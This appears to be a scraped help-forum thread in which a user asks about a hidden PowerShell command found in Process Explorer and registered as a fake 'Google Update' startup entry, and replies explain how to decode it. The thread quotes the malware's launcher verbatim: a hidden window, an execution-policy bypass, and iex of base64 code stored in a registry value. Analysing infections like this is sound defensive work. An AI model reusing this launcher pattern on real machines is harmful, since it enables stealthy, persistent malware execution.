I get this line by ProcessExplorer
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\ZXWNMNLIMAGAL').LOOTDA)));
It looks suspicious or normal ? Is that mean that the script is saved in registry and not in a file ? how to read then ?
Edit : Now i'm sure that can be an encoded virus when i read this on the registry :
Google Update REG_SZ
"C:\\Users\\michael\\AppData\\Local\\Google\\Update\\GoogleUpdate.exe" /c {BE9473EA-5660-4BF7-91C3-2A2258213EE1} REG_SZ C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\ZXWNMNLIMAGAL').LOOTDA)));
Edit on 29/03/2016 @ 15:55
If anybody want to continue this discussion i asked it here to decode this virus :
How can i read the source code of this encoded powershell script from the registry?
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\ZXWNMNLIMAGAL').LOOTDA)));
This code means that PowerShell will execute with no window and bypassing ExecutionPolicy restrictions a command from registry key HKCU:\\Software\\Classes\\ZXWNMNLIMAGAL
(base64-encoded).
Looks like a virus to me.
You can identify the command if you execute this code in the PowerShell console:
([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)))
This will show you what is intended to execute.
I got the same. i'm not sure, but it would be a hidden script runs in powershell. the script may be a phishing one. i think mine send emails to my outlook contacts.
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.